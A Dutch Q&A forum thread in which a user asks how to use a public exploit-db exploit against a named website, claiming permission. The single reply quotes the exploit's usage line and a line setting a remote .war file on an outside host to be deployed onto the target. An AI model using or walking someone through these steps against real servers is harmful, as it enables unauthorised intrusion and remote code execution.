Hoe werkt de exploit 28713.php voor een Apache Coyote 1/1 server ?

Dit is de url exploit van de exploit-db https://www.exploit-db.com/exploits/28713/

Ik heb toestemming van mijn roostermakers om op deze site www.hackthis.zportal.nl alles te proberen en nu heb ik dus deze exploit gevonden die als het goed is past bij het server type Apache Cotote 1/1! Alleen heb ik het belangerijkste nog niet... De informatie over hoe ik de exploit kan gebruiken ik heb al geprobeerd om hem in Metasploit te zetten maar dan zegt hij : Can't load module. Ik heb hem al in verschillende post explotation programma's gezet maar dan zegt hij dat er een unexpected syntax error is.

Zou iemand mij uit kunnen leggen hoe deze exploit werkt. Alvast bedankt.

-Michiel

Weet jij het antwoord?

/2500

Het belangrijkste staat gewoon in de PHP code.... Ik zal je een stukje op weg helpen: Usage: C:\PHP>php 9sg_ejb.php 192.168.0.1 id Maar eerst doe je dit: //change this if you want, url to the app to be deployed, keep it short $url="http://retrogod.altervista.org/a.war?"; Je moet dus wel even PHP installeren om php script te kunnen uitvoeren, maar dat wist je natuurlijk al als doorgewinterde h4ck3r....

Stel zelf een vraag

Ben je op zoek naar het antwoord die ene vraag die je misschien al tijden achtervolgt?

/100